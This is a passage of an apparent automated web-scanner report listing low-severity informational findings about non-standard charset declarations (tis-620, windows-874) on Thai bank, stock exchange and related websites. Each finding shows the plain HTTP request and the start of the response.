32.10. http://marketdata.set.or.th/mkt/topten.do  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://marketdata.set.or.th
Path:   /mkt/topten.do

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /mkt/topten.do?language=en&country=US HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/sitemap/for_listing.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:59:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Language: en-US
Set-Cookie: JSESSIONID=23A1B718BE31C3B5E88C96682836394A; Path=/mkt
Content-Length: 57003


<html>
<head>
<link href="/mkt/styles/setstyle.css;jsessionid=23A1B718BE31C3B5E88C96682836394A" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" t
...[SNIP]...

32.11. http://marketdata.set.or.th/shortcut-en.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://marketdata.set.or.th
Path:   /shortcut-en.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /shortcut-en.html HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/mkt/topten.do?language=en&country=US
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=96

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:06:48 GMT
Server: Apache
Last-Modified: Thu, 05 Aug 2010 02:25:58 GMT
ETag: "46001c-1ccb-45423980"
Accept-Ranges: bytes
Content-Length: 7371
Content-Type: text/html

<html>
<head>
<title>The Stock Exchange of Thailand: Your Investment Resource for Thailand's Capital Market</title>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="/setstyle.css" rel="stylesheet" type="text/css">
...[SNIP]...

32.12. http://marketdata.set.or.th/static/market/set/indextab_en_US.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://marketdata.set.or.th
Path:   /static/market/set/indextab_en_US.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /static/market/set/indextab_en_US.html HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/integrated-set.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:48:29 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 13:48:00 GMT
ETag: "4602d1-4324-63650400"
Accept-Ranges: bytes
Content-Length: 17188
Content-Type: text/html


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title></title>
<link href="/mkt/styles/setstyle.css;jsessionid=D4EEC7E5656A8ACAE9CAF75E4DCB5B33" rel="styl
...[SNIP]...

32.13. http://moneytalk.scb.co.th/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://moneytalk.scb.co.th
Path:   /

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET / HTTP/1.1
Host: moneytalk.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: _uid8098=FB330C07.1; __utma=37298082.359090507.1304444124.1304444124.1304444124.1; __utmz=37298082.1304444124.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visit_time=12324; ASPSESSIONIDSQTQRTAB=EJOJLEJDNJCJDOIGAOKIKFEP; ASPSESSIONIDQSSRQSAA=GOGFIDBAAKJCHLGGCNKPGDDG

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 18:07:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 29865
Content-Type: text/html
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- Check Parameter -->


<!-- Check Parameter -->

<html>
<head>
<title>Welcome to Money Talk</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<meta name="Keywords" content="moneytalk.scb.co.th, scb.co.th, ................, ........................, ......, .........., ........, ........, ..........., ....., ..........., ............, ....
...[SNIP]...

32.14. http://moneytalk.scb.co.th/index.asp  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://moneytalk.scb.co.th
Path:   /index.asp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /index.asp HTTP/1.1
Host: moneytalk.scb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 13:24:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 29865
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQTQRTAB=EEOJLEJDEGJCLJGFIDLKGIDM; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- Check Parameter -->


<!-- Check Parameter -->

<html>
<head>
<title>Welcome to Money Talk</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<meta name="Keywords" content="moneytalk.scb.co.th, scb.co.th, ................, ........................, ......, .........., ........, ........, ..........., ....., ..........., ............, ....
...[SNIP]...

32.15. https://online.kasikornbankgroup.com/K-Online/ib/login_en.jsp  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://online.kasikornbankgroup.com
Path:   /K-Online/ib/login_en.jsp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /K-Online/ib/login_en.jsp HTTP/1.1
Host: online.kasikornbankgroup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:54:04 GMT
Set-Cookie: JSESSIONID=0001wQXXNsIyMCMHC2wjXxvowKZ:1DLJUVVU3R; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 43843

...


<html>
<head>
<title>Welcome to K-Cyber Banking</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<meta http-equiv="CACHE-CONTROL" content="NO-CACHE">
...[SNIP]...

32.16. http://register2.set.or.th/semreg/detail.aspx  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://register2.set.or.th
Path:   /semreg/detail.aspx

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /semreg/detail.aspx HTTP/1.1
Host: register2.set.or.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 13:32:58 GMT
X-Powered-By: ASP.NET
Connection: close
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=xq1ifbuenuff1juvhqtkga45; path=/
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 5867


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>detail</title>
       <meta content="True" name="vs_snapToGrid">
       <meta content="Microsoft Visual Studio .NET
...[SNIP]...

32.17. http://register2.set.or.th/semreg/enroll.aspx  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://register2.set.or.th
Path:   /semreg/enroll.aspx

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /semreg/enroll.aspx?ow=FKH&cs=S0001&sn=0050 HTTP/1.1
Host: register2.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://register2.set.or.th/semreg/detail.aspx?ow=FKH&cs=S0001&sn=0050
Cookie: ASP.NET_SessionId=2nr0a545weyfl4ivrwijkwi5; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 14:14:56 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 101249


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>enroll</title>
       <meta content="True" name="vs_snapToGrid">
       <meta content="True" name="vs_showGrid">
       
...[SNIP]...

32.18. http://rtradeinfo.bualuang.co.th/tradinginfo.services/price_update.php  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://rtradeinfo.bualuang.co.th
Path:   /tradinginfo.services/price_update.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /tradinginfo.services/price_update.php?lang=E HTTP/1.1
Host: rtradeinfo.bualuang.co.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/bangkok%20bank/pages/main.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:44:52 GMT
Server: Apache
X-Powered-By: PHP/4.3.3
Content-Type: text/html
Content-Length: 1827

<html>
<head>
<title>Loan Rates</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="css/bbl_style.css" rel="stylesheet" type="text/css">
<style>
<!--
body {
   
...[SNIP]...

32.19. http://sorgalla.com/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://sorgalla.com
Path:   /

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET / HTTP/1.1
Host: sorgalla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:25:53 GMT
Server: Apache
Vary: Cookie
WP-Super-Cache: Served legacy cache file
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html; charset="UTF-8"
Content-Length: 39514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="de-DE">
<head profi
...[SNIP]...
</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="PHP, Zend Framework, Datenbanken und was sonst noch so anf..llt." />
...[SNIP]...

32.20. http://sorgalla.com/jcarousel/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://sorgalla.com
Path:   /jcarousel/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /jcarousel/ HTTP/1.1
Host: sorgalla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:25:52 GMT
Server: Apache
Vary: Cookie
WP-Super-Cache: Served legacy cache file
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html; charset="UTF-8"
Content-Length: 13254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="de-DE">
<head profi
...[SNIP]...
</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="PHP, Zend Framework, Datenbanken und was sonst noch so anf..llt." />
...[SNIP]...

32.21. http://truehits.net/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://truehits.net
Path:   /

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET / HTTP/1.1
Host: truehits.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Tue, 03 May 2011 13:27:46 GMT
Server: Apache
Content-Length: 52037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="search" type="ap
...[SNIP]...
<meta name="keywords" content="Thailand Web Directory, Website Statistics , truehits.net, Ranking, ......, ....., ..........., ..., .........." />
<meta http-equiv="Content-Type" content="text/html; charset=tis-620" />
<link href="/css/u6isap.css" rel="stylesheet" type="text/css" />
...[SNIP]...

32.22. http://truehits.net/stat.php  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://truehits.net
Path:   /stat.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /stat.php HTTP/1.1
Host: truehits.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Tue, 03 May 2011 13:27:47 GMT
Server: Apache
Content-Length: 36450

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="search" type="ap
...[SNIP]...
<meta name="keywords" content="Thailand Web Directory, Website Statistics , truehits.net, Ranking, ......, ....., ..........., ..., .........." />
<meta http-equiv="Content-Type" content="text/html; charset=tis-620" />
<link href="/css/u6isap.css" rel="stylesheet" type="text/css" />
...[SNIP]...

32.23. http://www.bangkokbank.com/_layouts/NR/BangkokBankWebApps/Email%20Registration/subscribe.asp  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.bangkokbank.com
Path:   /_layouts/NR/BangkokBankWebApps/Email%20Registration/subscribe.asp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /_layouts/NR/BangkokBankWebApps/Email%20Registration/subscribe.asp HTTP/1.1
Host: www.bangkokbank.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/bangkok%20bank/pages/main.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQDDQRCA=FDNLAAIDBMPJDMNNDFGEJGBA; path=/
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:44:50 GMT
Age: 0
Proxy-Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMsSf ])
Content-Length: 6189

<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<!--<link href="/_layouts/NR/BangkokBankWebApps/Email Registration/EMAIL.CSS" rel="stylesheet" type="text/css">
...[SNIP]...

32.24. http://www.bangkokbank.com/_layouts/nr/AccountAccess/account.asp  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.bangkokbank.com
Path:   /_layouts/nr/AccountAccess/account.asp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /_layouts/nr/AccountAccess/account.asp HTTP/1.1
Host: www.bangkokbank.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/bangkok%20bank/pages/main.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQDDQRCA=DDNLAAIDMNEFBOEJKJKJCIBB; path=/
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:44:50 GMT
Age: 0
Proxy-Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMsSf ])
Content-Length: 5391

<html>
<head>
<title>Account Access</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<style type="text/css">
<!--
body {
   margin-left: 0px;
   margin-top: 0px;

...[SNIP]...

32.25. http://www.bangkokbank.com/_layouts/nr/BangkokBankWebApps/BLSresearch/MainBLS.asp  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.bangkokbank.com
Path:   /_layouts/nr/BangkokBankWebApps/BLSresearch/MainBLS.asp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /_layouts/nr/BangkokBankWebApps/BLSresearch/MainBLS.asp HTTP/1.1
Host: www.bangkokbank.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/bangkok%20bank/pages/main.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQDDQRCA=EDNLAAIDGGPICGJABGIJMIHA; path=/
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:44:50 GMT
Age: 0
Proxy-Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMsSf ])
Content-Length: 2241

<html>
<head>
<title>Loan Rates English</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="/_layouts/nr/BangkokBank/style/BBL.CSS" rel="stylesheet" type="text/css">
...[SNIP]...

32.26. http://www.bangkokbank.com/_layouts/nr/MajorRates/FXRatesRssEn.htm  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.bangkokbank.com
Path:   /_layouts/nr/MajorRates/FXRatesRssEn.htm

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /_layouts/nr/MajorRates/FXRatesRssEn.htm HTTP/1.1
Host: www.bangkokbank.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/_layouts/nr/MajorRates/MainBannerRss.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQDDQRCA=CDNLAAIDONLFLNJJKKMMJIGB; ASPSESSIONIDCADTTCQT=NFGICGIDOHJAODGEJHPJHDHE; _cbclose=1

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Type: text/html
Last-Modified: Tue, 03 May 2011 11:36:27 GMT
Accept-Ranges: bytes
ETag: "d09bd056869cc1:0"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:44:53 GMT
Age: 0
Proxy-Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMsSf ])
Content-Length: 3804

<html>
<head>
<title>FX Rates</title>
<META Http-Equiv="Cache-Control" Content="no-cache">
<META Http-Equiv="Pragma" Content="no-cache">
<META Http-Equiv="Expires" Content="0">
<META Http-Equiv="Cache-Control" Content="max-age=0">

<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<META Last-Modified:05/03/2011 18:36:27>
...[SNIP]...

32.27. http://www.bangkokbank.com/_layouts/nr/MajorRates/MainBannerRss.htm  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.bangkokbank.com
Path:   /_layouts/nr/MajorRates/MainBannerRss.htm

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /_layouts/nr/MajorRates/MainBannerRss.htm HTTP/1.1
Host: www.bangkokbank.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/bangkok%20bank/pages/main.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Type: text/html
Last-Modified: Thu, 28 Jan 2010 09:29:02 GMT
Accept-Ranges: bytes
ETag: "03cd53fc9fca1:0"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:31:59 GMT
Age: 772
Proxy-Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cHs f ])
Content-Length: 2012

<html>
<head>
<title>Loan Rates English</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="ratebanner.css" rel="stylesheet" type="text/css">
<style type
...[SNIP]...

32.28. http://www.business.barclays.co.uk/BRC1/jsp/brccontrol  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.business.barclays.co.uk
Path:   /BRC1/jsp/brccontrol

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /BRC1/jsp/brccontrol HTTP/1.1
Host: www.business.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:38:20 GMT
Set-Cookie: sesessionid=0WR5SM3IDSMYCPUZZCV04ZY;Path=/
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=646
Content-Language: en
Content-type: text/html
Content-length: 2371
Connection: close

<!-- Vignette V/5 Tue May 03 14:38:21 2011 -->


                                                   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<h
...[SNIP]...

32.29. http://www.ktam.co.th/en/alliance.php  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/alliance.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/alliance.php HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=e751e0758cd81a354193794d79a5a717

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:25:04 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 24884


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title>Krung Thai Asset Management Public Company Limited. :- Happy Life Happy Investment</title>
<link href="style
...[SNIP]...

32.30. http://www.ktam.co.th/en/declarationnav.php  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ktam.co.th
Path:   /en/declarationnav.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /en/declarationnav.php HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=e751e0758cd81a354193794d79a5a717

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:52:20 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 42141


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title></title>
<link href="style/page.txt" rel="stylesheet" type="text/css">
</head>

